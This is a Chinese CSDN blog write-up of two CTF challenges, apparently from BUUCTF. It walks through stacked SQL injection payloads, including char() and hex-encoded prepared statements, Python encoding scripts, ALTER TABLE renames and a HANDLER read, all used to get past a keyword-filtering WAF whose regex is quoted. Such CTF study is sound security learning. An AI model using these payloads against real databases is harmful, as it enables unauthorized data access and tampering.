随笔2

最新推荐文章于 2022-04-24 17:27:42 发布
最新推荐文章于 2022-04-24 17:27:42 发布
阅读量257 收藏
点赞数
分类专栏: 随笔
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45372008/article/details/107902285
版权

堆叠注入

- [强网杯 2019]随便注
1';show tables;  #回显两表:1919810931114514和words
1';show columns from `table_name`; 获取列名

1919810931114514表中有flag字段
words表中有id和data字段
输入1回显两个数据故查询的是words表
推测内部查询语句为select id,data from words where id='$id'
解:
一、预编译
因为过滤了select等字符,利用char()绕过
payload:

1';
Set @sql=char(115,101,108,101,99,116,32,42,32,102,114,111,109,32,96,49,57,49,57,56,49,48,57,51,49,49,49,52,53,49,52,96);
prepare tsql from @sql;
execute tsql;#

脚本编程十进制:

flag="select * from `1919810931114514`"
for i in range(len(flag)):
	if i == 0:
		print('char(%s'%ord(flag[i]),end="")
	else:
		print(',%s'%ord(flag[i]),end="")
print(')')

也可利用十六进制绕过waf
payload:

1';
Set @sql=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;
prepare tsql from @sql;
execute tsql;#

脚本编程十六进制

flag="select * from `1919810931114514`"
for i in range(len(flag)):
     print(hex(ord(flag[i])).replace("0x",""),end="")

二、修改表名与字段名
大概思路:因为我们想要页面回显flag内容,于是将words表名改为其他名字,然后将1919810931114514表名改为words,再把flag这个字段替换成id字段,最后查询select id from words where id='$id'就相当于查询select flag from words where flag='$flag'
payload:

1';
alter table words rename to test;
alter table `1919810931114514` rename to words;
alter table words change flag id varchar(100);#

最后输入1’ or 1=1# 得到flag

- [GYCTF2020]Blacklist

waf:

return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);

过滤了set,prepare,alter等所以上面两种方法行不通,看看表和列

1';show tables;  #回显两表:FlagHere和words
1';show columns from `table_name`; 获取列名

FlagHere表中有flag字段,words表中有id,words字段
还是默认查询回显words表中内容
解:以下摘抄
HANDLER … OPEN语句打开一个表,使其可以使用后续HANDLER … READ语句访问,该表对象未被其他会话共享,并且在会话调用HANDLER … CLOSE或会话终止之前不会关闭
payload:

1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#

写东西,理思路

越今朝!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MySQL 数据库 ALTER命令讲解
12-15
MySQL 为关系型数据库(Relational Database Management System), 这种所谓的”关系型”可以理解为”表格”的概念, 一个关系型数据库由一个或数个表格组成。 当我们需要修改数据表名或者修改数据表字段时,就需要使用到MySQL ALTER命令。 开始本章教程前让我们先创建一张表,表名为:testalter_tbl。 root@host# mysql -u root -p password; Enter password:******* mysql> use TUTORIALS; Database changed mysql> create table te
buuctf web
CyhDl666的博客
02-01 944
文章目录[GYCTF2020]Blacklist[ZJCTF 2019]NiZhuanSiWei[CISCN2019 华北赛区 Day2 Web1]Hack World [GYCTF2020]Blacklist 注入题 先输入’页面返回报错确定闭合方式 直接准备union注入1' union select 1,2# 返回一个正则表达式return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./
[GYCTF2020]Blacklist&&[强网杯 2019]随便注
uihijio的博客
05-06 466
因为2020blacklist是2019随便注的升级版,所以借着这个机会归纳一下 先做个比较两道题的不同处,由此可见blacklist是随便注的升级版。 blacklist比随便注多过滤了set,prepare,rename,alter。 过滤prepare,set是避免pdo预处理绕过 过滤rename,alter是避免修改表名的情况出现 而blacklist和随便注还有一种方法是handler...
BUUCTF [GYCTF2020] Blacklist
Senimo
12-08 1379
BUUCTF [GYCTF2020] Blacklist 启动靶机: 提交参数1后正常回显内容:
BUUCTF寒假刷题-Web
热门推荐
Braindance
02-28 6万+
寒假横向刷题(尽量) BUUCTF 2021.01.15 [HCTF 2018]WarmUp 进到靶机一个硕大的滑稽,查看源码有提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
docker 学习随笔
06-09
仅仅是个人通过自学对docker应用一些认知,随笔记录一下,敬请指教
MATHCAD学步随笔
07-26
工程数学软件实用入门资料,可视很好,不需要专门的语言。
随笔
12-21
Pandas–sort_values ## 参数 DataFrame.sort_values(by, axis=0, ascending=True, inplace=False, kind='quicksort', na_position='last') #### 参数说明 axis:{0 or ‘index’, 1 or ‘columns’}, default 0,...
随笔
02-20
2. **项目经验分享**:作者可能会分享他们在实际项目中遇到的问题及解决方案,比如如何处理大数据,如何优化数据库查询,或者在分布式系统中解决同步问题的经验。 3. **新技术探索**:随笔可能涉及到新兴的技术趋势...
容斋随笔---------------------------.pdf
03-27
容斋随笔
CTF-SQL注入总结
SWC0619的博客
03-11 8265
SQL注入总结(一)
GYCTF2020_Writeup
Lethe's Blog
03-15 2580
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
过滤select|update|delete|drop|insert|where的注入 [ 强网杯 2019]随便注
lonmar的博客
04-08 4693
转载于 攻防世界WP https://adworld.xctf.org.cn/task/writeup?type=web&id=5417&number=3&grade=1&page=1 题目链接https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=541...
Web安全学习新手入门Week11
m0_59271033的博客
04-24 2979
Web安全新手入门
sql注入总结(未完)
Y_KolaFish_Y的博客
07-26 187
sql注入总结 一、有回显 二、无回显(盲注) 1、报错注入 (使用前提是虽然没有回显,但是有报错显示,主要涉及xpath语法错误) 涉及关键词: extractvalue、updatexml、floor extractvalue函数 函数原型:extractvalue(xml_document,Xpath_string) 正常语法:extractvalue(xml_document,Xpath_string); 第一个参数:xml_document是string格式,为xml文档对象的名称 第二个参数:
asp档案管理系统的设计与实现(源代码+论文).rar
08-10
资源包主要包含以下内容: ASP项目源码:每个资源包中都包含完整的ASP项目源码,这些源码采用了经典的ASP技术开发,结构清晰、注释详细,帮助用户轻松理解整个项目的逻辑和实现方式。通过这些源码,用户可以学习到ASP的基本语法、服务器端脚本编写方法、数据库操作、用户权限管理等关键技术。 数据库设计文件:为了方便用户更好地理解系统的后台逻辑,每个项目中都附带了完整的数据库设计文件。这些文件通常包括数据库结构图、数据表设计文档,以及示例数据SQL脚本。用户可以通过这些文件快速搭建项目所需的数据库环境,并了解各个数据表之间的关系和作用。 详细的开发文档:每个资源包都附有详细的开发文档,文档内容包括项目背景介绍、功能模块说明、系统流程图、用户界面设计以及关键代码解析等。这些文档为用户提供了深入的学习材料,使得即便是从零开始的开发者也能逐步掌握项目开发的全过程。 项目演示与使用指南:为帮助用户更好地理解和使用这些ASP项目,每个资源包中都包含项目的演示文件和使用指南。演示文件通常以视频或图文形式展示项目的主要功能和操作流程,使用指南则详细说明了如何配置开发环境、部署项目以及常见问题的解决方法。 毕业设计参考:对于正在准备毕业设计的学生来说,这些资源包是绝佳的参考材料。每个项目不仅功能完善、结构清晰,还符合常见的毕业设计要求和标准。通过这些项目,学生可以学习到如何从零开始构建一个完整的Web系统,并积累丰富的项目经验。
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习
最新发布
08-10
简历-求职简历-word-文件-简历模版免费分享-应届生-高颜值简历模版-个人简历模版-简约大气-大学生在校生-求职-实习 简历是展示个人经历、技能和能力的重要文档,以下是一个常见的简历格式和内容模板,供您参考: 简历格式: 头部信息:包括姓名、联系方式(电话号码、电子邮件等)、地址等个人基本信息。 求职目标(可选):简短描述您的求职意向和目标。 教育背景:列出您的教育经历,包括学校名称、所学专业、就读时间等。 工作经验:按时间顺序列出您的工作经历,包括公司名称、职位、工作时间、工作职责和成就等。 技能和能力:列出您的专业技能、语言能力、计算机技能等与职位相关的能力。 实习经验/项目经验(可选):如果您有相关实习或项目经验,可以列出相关信息。 获奖和荣誉(可选):列出您在学术、工作或其他领域获得的奖项和荣誉。 自我评价(可选):简要描述您的个人特点、能力和职业目标。 兴趣爱好(可选):列出您的兴趣爱好,展示您的多样性和个人素质。 参考人(可选):如果您有可提供推荐的人员,可以在简历中提供其联系信息。 简历内容模板: 姓名: 联系方式: 地址: 求职目标: (简短描述您的求职意
施耐德ATV61变频器编程手册
08-10
施耐德ATV61变频器编程手册
QorIQ LS1021A Reference Manual Supports LS1020A and LS1022A
08-10
Chapter 1 Overview 1.1 Introduction 1.2 Features summary 1.3 Application examples Chapter 2 Memory Map 2.1 Memory map overview Chapter 3 Signal Descriptions Chapter 4 Reset, Clocking, and Initialization Chapter 5 Interrupt Assignments Chapter 6 Arm Modules Chapter 7 CSU, OCRAM, and MSCM Chapter 8 Interconnect Fabric Chapter 9 Pre-Boot Loader (PBL) Chapter 10 Secure Boot and Trust Architecture Chapter 11 Supplemental Configuration Unit Chapter 12 Device Configuration and Pin Control
android 心情随笔
04-26
Android心情随笔是一款基于Android平台的应用程序,它允许用户记录和分享自己的心情、感受和思考。用户可以通过文字、图片、音频等方式表达自己的情绪和心情,并将其保存在应用中。此外,用户还可以选择将心情随笔分享到社交媒体平台或发送给朋友,以与他人交流和分享自己的情感。 该应用还提供了一些额外的功能,如心情统计分析、标签分类、提醒设置等,帮助用户更好地管理和理解自己的情绪变化。用户可以通过统计分析功能了解自己的情绪走向和变化趋势,通过标签分类功能对心情进行分类整理,通过提醒设置功能定期记录心情。 此外,Android心情随笔还支持备份和恢复功能,用户可以将自己的心情数据备份到云端,以防止数据丢失或更换设备时方便恢复。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值